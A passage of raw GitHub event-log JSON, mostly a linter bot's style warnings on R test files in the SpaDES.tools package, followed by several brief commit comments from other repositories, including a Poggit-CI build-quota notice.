^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:6:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-examples.R#L6) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:17:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-examples.R#L17) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:886:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L886) *style:* **Lines should not be more than 100 characters.**\n```r\n​                      spreadProb = 0.23, persistProb = 0.8, iterations = 10, directions = 8L, plot.it = FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:891:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L891) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  M <- matrix(0.8, nrow = 50, ncol = 50)\n  ^\n```\n[tests/testthat/test-spread2.R:898:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L898) *style:* **Put spaces around all infix operators.**\n```r\n​  start <- c(50, length(landscape)-49)\n                                 ~^~\n```\n[tests/testthat/test-spread2.R:902:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L902) *style:* **Lines should not be more than 100 characters.**\n```r\n​                        spreadProb = 0.23, persistProb = persistRas, iterations = 10, directions = 8L,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:916:14:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L916) *style:* **Use <-, not =, for assignment.**\n```r\n​  spreadProb = landscape\n             ^\n```\n[tests/testthat/test-spread2.R:918:72:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/tests/testthat/test-spread2.R#L918) *style:* **Commas should always have a space after.**\n```r\n​  expect_silent(spread2(landscape = landscape, spreadProb = spreadProb,start = start,\n                                                                       ^\n```"}},"created_at":"2018-07-24T04:07:21Z"}
{"id":"8007707907","type":"CommitCommentEvent","actor":{"login":"mysbcom"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808617,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T04:07:28Z","updated_at":"2018-07-24T04:07:28Z","author_association":"NONE","body":"Great project, Finally I found an unique project"}},"created_at":"2018-07-24T04:07:28Z"}
{"id":"8007711864","type":"CommitCommentEvent","actor":{"login":"SenthilKumarGS"},"repo":{"name":"Samsung/TizenRT"},"payload":{"comment":{"id":29808624,"position":5,"line":974,"path":"framework/src/st_things/st_things_request_handler.c","commit_id":"74d9ebe46f4dc4d2d1485f5e3fca823f1cd44e87","created_at":"2018-07-24T04:09:05Z","updated_at":"2018-07-24T04:09:05Z","author_association":"NONE","body":"Hello @YiHyunJin ,\r\nI kindly request you to let me know the purpose of this change.\r\nReason: We are currently looking into an issue related to this code change."}},"created_at":"2018-07-24T04:09:05Z"}
{"id":"8007713462","type":"CommitCommentEvent","actor":{"login":"yaakov-h"},"repo":{"name":"SteamDatabase/Protobufs"},"payload":{"comment":{"id":29808625,"position":null,"line":null,"path":null,"commit_id":"e88847b390b28736e41d03f9614e23371aab50cf","created_at":"2018-07-24T04:09:42Z","updated_at":"2018-07-24T04:09:42Z","author_association":"MEMBER","body":"Actual change, or buggy dumper?"}},"created_at":"2018-07-24T04:09:42Z"}
{"id":"8007715953","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/MegaShop2"},"payload":{"comment":{"id":29808627,"position":null,"line":null,"path":null,"commit_id":"bc74f9276cb471edf300f712dd0f6a4cd37d29fa","created_at":"2018-07-24T04:10:43Z","updated_at":"2018-07-24T04:10:43Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/MegaShop2/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `876a26f4-8ef7-11e8-854c-3445042ed0e7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on 